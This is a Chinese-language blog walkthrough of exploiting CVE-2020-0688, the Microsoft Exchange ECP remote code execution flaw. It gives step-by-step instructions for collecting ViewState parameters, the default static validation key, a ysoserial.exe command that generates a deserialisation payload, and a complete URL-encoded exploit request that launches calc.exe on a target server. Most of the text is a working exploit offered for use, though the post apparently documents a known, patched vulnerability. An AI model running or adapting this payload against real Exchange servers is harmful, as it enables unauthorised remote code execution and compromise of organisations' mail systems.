# CVE-2020-0688 微軟EXCHANGE服務遠程代碼執行漏洞
==影響版本==
exchange 2010、2013、2016、2019
==漏洞利用==
1、獲取ViewStateUserKey值
/ecp/default.aspx
F12打開開發工具的Network選項,然後按F5重新發送請求。我們需要找到/ecp/default.aspx的響應(NET_SessionId)
2、獲取取VIEWSTATEGENERATOR值:
同樣在/ecp/default.aspx的響應包內,直接搜索關鍵詞即可。
或使用document.getElementById(“VIEWSTATEGENERATOR”).value
如果發現沒有改字段,是因為系統沒有安裝KB2919355補丁,更新該補丁後可顯示,但是該字段值基本唯一,不需要刻意獲得。
3.整理已知參數
–validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(默認,漏洞產生原因)
–validationalg = SHA1(默認,漏洞產生原因)
–generator = B97B4E27(基本默認)
–viewstateuserkey = d673d1a4-1794-403e-ab96-e283ca880ef2(手工獲取,變量,每次登陸都不一致)
4.生成payload:
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="d673d1a4-1794-403e-ab96-e283ca880ef2" --isdebug --islegacy
上面ysoserial.exe生成的payload要用URL Encode編碼
完整示例:
https://192.168.1.248/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyhAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACmBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BY2FsYy5leGU8L1N5c3RlbTpTdHJpbmc%2BDQogICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291cmNlRGljdGlvbmFyeT4Lp73ado0NJN2PSSnfOoN9h4H7xCU%3D
成功彈出計算器。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容